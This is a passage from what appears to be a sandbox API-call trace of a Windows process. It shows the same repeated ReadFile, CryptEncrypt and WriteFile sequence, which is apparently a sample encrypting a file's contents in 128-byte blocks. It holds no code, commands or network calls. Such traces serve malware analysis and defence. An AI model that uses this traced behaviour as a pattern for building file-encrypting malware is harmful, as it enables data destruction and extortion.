lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.829] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.830] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.830] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.831] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.831] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.832] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.832] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, 